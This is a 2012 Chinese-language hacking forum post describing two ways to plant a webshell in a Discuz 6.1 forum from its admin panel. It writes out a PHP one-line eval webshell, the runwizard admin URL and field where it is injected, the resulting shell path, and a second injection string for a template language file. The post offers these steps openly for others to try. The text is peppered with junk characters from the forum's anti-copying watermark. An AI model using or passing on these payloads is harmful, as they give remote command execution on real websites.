找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2344|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
discuz6.1两种方法后台拿shell
9 N& ]; G8 Q: k% q' s好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下  o& R" C- [; t: Y) \1 `4 t- ]
1:; V& k4 U# F, J1 l4 w: |% ~% q
http://127.0.0.1/discuz/admincp. ... zard&frames=yes+ {) l% ^! k3 @
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
1 q3 K1 K$ }5 K4 s/ n; g<?php eval($_POST[cmd]);?>5 L. A- g( a! N; }
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php: y& B; u0 b6 f
) f4 x2 z2 |4 v
3 X8 m2 {. b3 K# v6 k5 f5 ]7 T* H
2:后台模板管理--默认模板套系--详情
; m$ K$ p$ m3 v" k1 wtemplates/default/actions.lang.php
* l- L) M" o$ wjhackj\\');eval($_POST[cmd])?>;//& O* K$ i. V) |4 W

- R& @7 y# o3 C8 Y6 \0 K利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表